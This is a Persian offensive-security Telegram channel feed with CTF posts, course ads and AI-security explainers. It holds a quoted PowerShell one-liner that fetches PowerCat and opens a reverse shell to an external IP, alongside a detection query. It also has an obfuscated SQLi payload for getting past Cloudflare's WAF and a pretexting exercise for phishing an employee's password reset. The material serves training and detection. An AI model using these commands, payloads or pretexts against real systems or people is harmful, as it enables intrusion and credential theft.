Try Hack Box
Open in Telegram
1 Nov 2020 1399/08/11 🔴 THB | Offensive Security آموزش، تحقیق و تجربه عملی در امنیت تهاجمی Penetration Testing · Red Teaming · AI Security 🎯 یاد بگیر. آزمایش کن. حرفهای شو.
Show more6 473
Subscribers
+724 hours
+637 days
+11130 days
Posts Archive
6 474
🚀 دعوت به همکاری داوطلبانه در تیم TryHackBox
آیا به امنیت سایبری، آموزش و اشتراک دانش علاقهمند هستید؟
تیم TryHackBox در حال توسعه یک جامعه و پلتفرم تخصصی در حوزه Cyber Security است؛ هدف ما ایجاد بستری برای یادگیری عملی، تولید محتوای تخصصی، انتشار پژوهش ها، پادکست های امنیتی، مسیرهای آموزشی، چالش ها و پروژههای فنی است.
برای توسعه تیم، از افراد علاقهمند و متخصص دعوت میکنیم به صورت داوطلبانه همراه ما باشند.
🔹 موقعیت های همکاری:
RedTeam
Pentest
Ai Security
Networking & linux
📚 تولید محتوا و آموزش
• نویسنده مقالات امنیتی
• مدرس و طراح مسیرهای یادگیری
• مترجم منابع تخصصی
• تولیدکننده محتوای آموزشی
• گوینده و تهیه کننده پادکست های امنیتی
• پژوهشگر و تحلیلگر اخبار و ترندهای امنیت سایبری
💻 توسعه و فناوری
• برنامه نویس Backend / Frontend و Ui
• توسعه ابزارهای امنیتی
• DevOps و زیرساخت
🎯 شرایط همکاری:
✅ علاقهمند به رشد جامعه امنیت سایبری
✅ توانایی کار تیمی و مسئولیتپذیری
✅ علاقه به یادگیری و انتقال تجربه
🎁 مزایای همکاری:
⭐ عضویت در تیم TryHackBox
⭐ ساخت رزومه و برند شخصی در حوزه امنیت
⭐ معرفی فعالیت ها و دستاوردها در جامعه TryHackBox
⭐ همکاری در تولید مقالات، پادکست ها، آموزش ها و پروژههای تخصصی
⭐ دریافت گواهی همکاری
اگر علاقهمند هستید در ساخت یک جامعه امنیتی قدرتمند نقش داشته باشید، خوشحال میشویم شما را در تیم TryHackBox ببینیم.
🔗 درخواست همکاری:
@Thbxsupport
#TryHackBox #CyberSecurity #InfoSec #RedTeam #BlueTeam
6 474
Repost from رادیو زیرو پاد
📌 آیا عامل هوش مصنوعی OpenAI واقعاً Hugging Face را هک کرد؟
در هر قسمت، مهم ترین اخبار و رویدادهای دنیای امنیت سایبری، هوش مصنوعی، هک، آسیبپذیری ها و فناوری را به زبان ساده و با تحلیل فنی بررسی میکنیم تا همیشه از آخرین اتفاقات این حوزه باخبر باشید.🎙 راوی : ARVIN 🆔 @RadioZeroPod 🆔 @TryHackBox 🆔 @TryHackBoxOfficial 🆔 @AiTHB
6 474
🚩 TryHackBox | چالش #1: Broken Login Portal
📂 دسته: Web / SQL Injection
🎯 سطح: متوسط
🏳️ فرمت فلگ: THB{...}
سناریو:
یک شرکت فرضی یک پورتال مدیریت داخلی ساخته و مدعیه که ورودی های کاربر رو فیلتر کرده و امن هست. وظیفه شما به عنوان پنتستر: نشون بدید این ادعا درست نیست. هدف نهایی: پیدا کردن فلگ مخفی شده در سیستم. فایل های چالش: 👇 (ضمیمه همین پست) شامل سورس اپ + Dockerfile برای اجرای آسان + README کامل با راهنمای راهاندازی. نحوه اجرا:
docker build -t tryhackbox-c1 .
docker run -p 5000:5000 tryhackbox-c1
یا
pip install -r requirements.txt
python3 app.py
بعد برید به: http://localhost:5000
فلگ رو دقیقاً با فرمت THB{...} به بات ارسال کنید.
@Unique_exploitbot
راهنمایی هم داخل README هست، اگه گیر کردید نگاه کنید.
موفق باشید!
نظرتون راجب این ctf کامنت کنید .
@TryHackBox6 474
فراخوان همکاری داوطلبانه طراح UI/UX
در حال توسعه یک پلتفرم آموزشی امنیت سایبری هستیم و برای تکمیل تیم، از یک طراح UI/UX دعوت میکنیم بهصورت داوطلبانه در کنار ما همکاری کند.
هدف ما طراحی یک رابط کاربری مدرن، ساده و کاربرپسند است که تجربهای حرفهای برای کاربران و علاقهمندان حوزه امنیت سایبری فراهم کند.
مهارتهای موردنیاز
تسلط بر طراحی رابط کاربری (UI)
آشنایی با اصول تجربه کاربری (UX)
توانایی کار با Figma یا ابزارهای مشابه
طراحی صفحات ریسپانسیو و مدرن
آشنایی با Design System و Componentها
اگر به ساخت یک پروژه واقعی، توسعه رزومه و همکاری در کنار یک تیم فعال در حوزه امنیت سایبری علاقهمند هستید، خوشحال میشویم در کنار ما باشید.
مزایای همکاری
ثبت نام و نقش شما در تیم پروژه و معرفی در بخش همکاران (پس از انتشار)
ساخت نمونهکار (Portfolio) واقعی و قابل ارائه
دریافت گواهی همکاری پس از مشارکت مؤثر در پروژه
اولویت برای همکاری های آینده و پروژههای تجاری و درآمدزا
امکان شبکه سازی
مشارکت در ساخت محصولی که توسط هزاران کاربر مورد استفاده قرار خواهد گرفت
این همکاری در حال حاضر داوطلبانه است و هدف، ساخت یک پلتفرم آموزشی ارزشمند برای جامعه امنیت سایبری است. اعضای اولیه تیم، نقش مهمی در شکلگیری و توسعه آینده این پروژه خواهند داشت و در صورت تبدیل پروژه به یک فعالیت تجاری، اعضای فعال تیم در اولویت همکاری های بعدی خواهند بود.
در صورت تمایل به همکاری، لطفاً از طریق پیام خصوصی با ما در ارتباط باشید.
@ThbxSupport
6 474
TryHackBox #CTF #1
سطح : خیلی آسان
یه چالش امنیت سایبری آماده کردیم! دو فایل زیر رو دانلود کنید و فلگ رو پیدا کنید 👇
/ TryHackBox CTF 1.Zip | | __ tryhackbox_challenge.png |_ _ challenge.zipراهنمای چالش:
۱. فایل challenge.zip رمزدار هست. ۲. رمز داخل فایل tryhackbox_challenge.png هست دقت کنید که همه چیز تو یه عکس همیشه فقط ظاهرش نیست . ۳. وقتی زیپ رو باز کردید، داخلش یه متن هست که هنوز فلگ نهایی نیست یه مرحله دیکد دیگه لازمه.فرمت فلگ:
TryHackBox{...}ارسال فلگ به : @Unique_exploitbot #CTF #TryHackBox #CyberSecurity @TryHackBox
6 474
Repost from Try Hack Box
📌 دوره: راهنمای جامع ابزار Mimikatz
💢 توضیحات دوره: Mimikatz بدون شک یکی از مهم ترین و موثرترین ابزارهایی است که در دنیای امنیت سایبری و عملیات تیم قرمز مورد استفاده قرار می گیرد.این ابزار توسط برنامه نویس فرانسوی Benjamin Delpy ایجاد شد.او در ابتدا Mimikatz را برای یادگیری عمیق تر زبان C و درک بهتر مکانیزم های امنیتی ویندوز توسعه داد.
این ابزار با بهره برداری هوشمند از ضعف های موجود در معماری ویندوز،مجموعهای از حملات مهم و پرکاربرد را به صورت یکپارچه و آماده ارائه می دهد. Mimikatz کار را برای متخصصان بسیار آسان تر کرده است؛به شکلی که بدون نیاز به دانش بسیار تخصصی از ساختارهای داخلی،می توان از آن برای گسترش دسترسی در شبکه های مبتنی بر ویندوز استفاده کرد.این ابزار همچنان فعالانه به روزرسانی میشود و تکنیک های جدید به آن اضافه می گردد.
📌 توضیحات کامل
◽مدرس : مهندس سجاد تیموری
◽مدت زمان دوره : ۵ ساعت ۲۰ دقیقه
◻ دوره : آفلاین
⭕ دوره دارای گروه پشتیبانی می باشد.
💰 قیمت : ۲,۰۰۰,۰۰۰ تومان
💰 با تخفیف ویژه : ۱,۲۵۰,۰۰۰ تومان
📌 جهت خرید،به ایدی زیر پیام دهید:
@ThbxSupport
Group
@TryHackBox
6 474
در حال تشکیل یک تیم داوطلبانه کوچک برای توسعه یک پلتفرم در حوزه امنیت سایبری هستیم. پروژه در مرحله شروع قرار داره و میخوایم اعضای اصلی تیم رو از همین ابتدا کنار هم جمع کنیم تا مسیر رشد پروژه رو با هم بسازیم.
در حال حاضر، برای این نقش ها به صورت مشخص نیاز داریم:
- Front-end Development
- Back-end Development
- Database
- DevOps و Cloud
اگر در یکی از این حوزه ها فعالیت میکنید یا میخواید روی یک پروژه واقعی تجربه بگیرید، خوشحال میشویم باهم صحبت کنیم.
چرا این همکاری میتونه ارزشمند باشه؟
✅ تجربه عملی کار روی یک پروژه واقعی، از ایده تا انتشار
✅ همکاری با یک تیم هدفمند در حوزه امنیت سایبری و توسعه نرمافزار
✅ ثبت نقش شما در صفحه تیم پروژه (Contributor/Team Member)
✅ گواهی همکاری پس از مشارکت مؤثر
✅ امکان استفاده از پروژه در رزومه، LinkedIn و GitHub
✅ اولویت برای همکاری های بلندمدت در صورت رشد پروژه
این همکاری در حال حاضر داوطلبانه است. هدف ما در این مرحله، ساخت یک محصول حرفهای و کسب تجربه و سابقه کاری واقعی برای همه اعضای تیمه.
🔴 جهت ارتباط با ما به پشتیبانی پیام دهید :
@ThbxSupport
6 474
Repost from TryHackBox ( AI Security )
معماری RAG: طراحی، امنیت و حملات
RAG (Retrieval-Augmented Generation) یک معماری ترکیبی است که بازیابی اطلاعات (Retrieval) را با تولید زبان طبیعی (Generation) ادغام میکند تا پاسخهای دقیقتر و مبتنی بر داده تولید کند.
اجزای اصلی معماری
1. Query Encoder: تبدیل پرسش کاربر به Vector Embedding معنایی.
2. Retriever: جستجو در Vector Database (مانند FAISS یا ChromaDB) برای یافتن اسناد مرتبط.
3. Generator: مدل زبانی (مانند GPT یا BART) که پاسخ را بر اساس اسناد بازیابیشده تولید میکند.
4. Knowledge Base: مخزن خارجی اسناد متنی که دانش سیستم را بهروز نگه میدارد.
فرآیند عملیاتی
کاربر سوال میپرسد → سوال به بردار تبدیل میشود → Retriever اسناد مرتبط را بازیابی میکند → Generator پاسخ نهایی را تولید میکند.
حملات رایج به RAG
1. Knowledge Poisoning: تزریق دادههای مخرب به پایگاه دانش برای انحراف پاسخها.
2. Indirect Prompt Injection: دستکاری ورودی کاربر برای تغییر رفتار Retriever یا Generator.
3. Cross-Tenant Leakage: دسترسی غیرمجاز به دادههای کاربران دیگر در سیستمهای چندمستاجره.
چالشهای امنیتی
- Data Integrity: اطمینان از صحت و اعتبار اسناد بازیابیشده.
- Access Control: جلوگیری از دسترسی به دادههای حساس یا طبقهبندیشده.
- Hallucination Mitigation: کاهش توهمهای مدل با استفاده از منابع معتبر.
معماری RAG با ترکیب Semantic Search و Language Generation، پل میان دانش خارجی و قدرت تولید مدلهای زبانی است، اما نیازمند لایههای دفاعی چندگانه برای مقابله با حملات نوظهور است.
🔥 اولین کانال فارسی زبان در AI Security .
@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial
6 474
⭕ سری چالش های SE : هک انسان 1/20
📌 چالش : "تماس IT پشتیبانی"
سناریو:
شما درحال مهندسی اجتماعی هستید و هدفتون دسترسی به اطلاعات داخلی یک شرکت فرضی به نام "Datanova" هست. شما به عنوان یک "کارمند پشتیبانی IT" با خانم/آقای میترا شاهینی، منشی بخش مالی، تماس میگیرید. 📌 هدف: گرفتن یوزرنیم و ریست پسورد ایمیلش (بدون اینکه شک کنه). 📓 اطلاعات از پیش: ◾ شما اسم مدیرش (سهراب فریدونی) رو از لینکدین پیدا کردید. ◾ میدونید شرکت هفته پیش یک آپدیت سیستمی داشته. ◾میترا معمولاً ساعت ۹ صبح سرکاره. ❓ سوال:
> شما چه دیالوگ و استراتژی ای برای این تماس استفاده می کنید تا میترا بهتون اعتماد کنه؟ (متن دقیق مکالمه یا حداقل ۳-۴ تاکتیکی که به کار میبرید رو تو کامنت بنویسید).@TryHackBox #مهندسی_اجتماعی
6 474
🔥 معرفی رسمی TryHackBox CTF
ا ◾ : TryHackBox CTF | مأموریت SE
۲۰ روز محک زدن مهارت مهندسی اجتماعی
آیا فکر میکنی میتونی ذهن یه انسان رو قبل از هر فایروال و سیستمی هک کنی؟
مهندسی اجتماعی قوی ترین سلاح در دنیای امنیت سایبریه چون هیچ آنتی ویروسی نمیتونه از اعتماد انسانی محافظت کنه.
از امروز، هر ۲-۳ روز یک سناریوی واقعی مهندسی اجتماعی براتون منتشر میکنیم. شما باید تو کامنت ها بگید تو اون شرایط دقیقاً چیکار میکنید تا نفوذ موفقی داشته باشید.
🎯 ۲۰ چلنج | ۱۰۰ امتیاز |
✅ برنده نهایی کسی که در کمترین تایم جواب بده
✅ هر چلنج ۵ امتیاز، امتیازها تجمعی ثبت میشه
✅ سناریوهای متنوع: تماس تلفنی، فیشینگ، حضوری، آنلاین و ترکیبی
✅ تحلیل تخصصی بعد از هر قسمت
🏆 جایزه پایانی:
اعضایی که در تمام ۲۰ چلنج مشارکت فعال داشته باشن و امتیاز 100 کسب کنن، کد تخفیف ویژه دوره/کتاب رو دریافت میکنن.
⏳ چلنج اول بهزودی منتشر میشه همین الان عضو بمون که جا نمونی.
#TryHackBox #ماموریت_SE #SocialEngineering #CTF
@TryHackBox
6 474
Repost from TryHackBox ( AI Security )
ا 🔖 : AI Agent Kill Chain را میتوان در هشت مرحله درک کرد.
ا▪️ : AI agent ها فقط چت بات نیستند. آنها میتوانند استدلال کنند، برنامه ریزی کنند، ابزارها را فراخوانی کنند، به داده ها دسترسی پیدا کنند، با APIها تعامل داشته باشند و در سیستم های متصل، اقداماتی انجام دهند. این قابلیت، یک سطح حملهی جدید و یک kill chain جدید ایجاد می کند. درس کلیدی ساده است: AI agentها هرگز نباید مثل اپلیکیشن های معمولی در نظر گرفته شوند. آنها به دسترسی سختگیرانهی least-privilege، تأیید انسانی برای اقدامات پرریسک، tool allowlists، اجرای ایزوله (isolated execution)، credentials کوتاه مدت، دفاع در برابر prompt injection و ثبت کامل audit logging نیاز دارند. با گسترش استفادهی سازمانها از agentic AI، فقط ایمن سازی مدل کافی نخواهد بود. باید خودِ agent، identity آن، tools آن، memory آن، دادههایش و هر سیستمی که به آن دسترسی دارد را ایمن کنید.🔥 اولین کانال فارسی زبان در AI Security . @TryHackBox @RadioZeroPod @AiTHB @TryHackBoxOfficial
6 474
🧩 گاهی اوقات، مجرمان سایبری تمایل دارند که دستگیر شوند. بیایید یک مثال دیگر و ابزاری را بررسی کنیم که من کمتر در حملات واقعی با آن مواجه شدهام.
🔖 طبق این گزارش، مهاجم از PowerShell برای دانلود و اجرای PowerCat استفاده کرده است
◾ یک ابزار متنباز، مشابه Netcat، برای اجرای یک شل معکوس:
powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString (‘hxxps://raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1’); powercat -c 154.17.26[.]41 -p 8080 -e cmd
همانطور که متوجه شدید، مهاجم نام ابزار را تغییر نداده است. و در بسیاری از موارد، این یک رویه رایج است. همین موضوع در مورد مخازن نیز صدق میکند.
مجرمان اغلب از PowerShell برای دانلود ابزارها از منابع رسمی استفاده می کنند.
بنابراین، این یک نکته مهم دیگر است که باید مستند شود و در هنگام جستجوی فعال و ایجاد منطق تشخیص، در نظر گرفته شود، به عنوان مثال:
event_type: "processcreatewin" AND cmdline: "powercat"فراموش نکنید که بلوک های اسکریپت نیز حاوی خطوط و توابع جالب زیادی هستند، فقط خود اسکریپت را بررسی کنید. اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید. @TryHackBox @TryHackBoxofficial @AiTHB @RadioZeroPod
6 474
یکی از قدیمی ترین و خطرناک ترین پروتکل ها که هنوز روی خیلی از دستگاه ها پیدا میشه.
دستورات حمله واقعی به Telnet رو ببینید 👇
https://x.com/i/status/2079051452673147071
6 474
Repost from رادیو زیرو پاد
⭕️ قسمت نهم زیرو تاک
📌 موضوع جلسه :
◾ا: DFIR در مقیاس: واقعیت های فارنزیک و معماری در امنسازی زیرساخت بانکی تراکنشی»
🎙 مهمان برنامه : مهندس صابر غفاری مقدم
منتظر جلسه بعدی باشید.
🎤 راهبر گفتگوی امنیتی : حسین نائیجی
🆔 @RadioZeroPod
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @AiTHB
6 474
Repost from رادیو زیرو پاد
📌 برگزاری جلسه ویس چت :
با درود خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص زمینه SOC به صورت ویس چت برگزار کنیم.
🎙 مهمان ویژه:
👤 مهندس : مهتاب کسائی
📅 زمان برگزاری: امشب
📍 پلتفرم: ویس چت تلگرام
🕗 ساعت : 20:00
🔖 لینک جلسه :
🎙 قسمت اول
⁉️ موضوعات ما :
◾️زندگی روزمره یک SOC Analyst/Security Engineer
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @RadioZeroPod
🆔 @TryHackBox
6 474
+1
🪲 نکته باگ بانتی: بایپس 403 Cloudflare برای Time-Based Blind SQLi
وقتی پیلودت توسط Cloudflare بلاک میشه (403)، با obfuscation از طریق URL encoding امتحان کن تا از فیلتر رد بشه!
❌ پیلود بلاکشده
(select(0)from(select(sleep(10)))v) → 403 Forbidden
✅ پیلود بایپس
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
🔍 این obfuscation میتونه Time-Based Blind SQLi رو حتی وقتی WAF فعاله trigger کنه.
کدوم obfuscation رو برای بایپس Cloudflare در SQLi تست کردی که delay رو trigger کرد؟ کامنت کن@TryHackBox #باگ_بانتی #بایپس
6 474
هک سیستم های SCADA : پیداکردن سیستم های SCADA با استفاده از Censys
همانطور که میدانید، سیستم های SCADA/ICS در سراسر جهان به طور مداوم مورد حمله قرار میگیرند. این سیستم های صنعتی هستند که در برخی موارد، میتوانند بر اقتصاد یک کشور تأثیر بگذارند و هدف اصلی در هر جنگ سایبری محسوب می شوند. پیداکردن آن ها با استفاده از ابزارهای مختلف (nmap / Shodan / و غیره) نسبتاً آسان است.
اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.
@TryHackBox
@TryHackBoxofficial
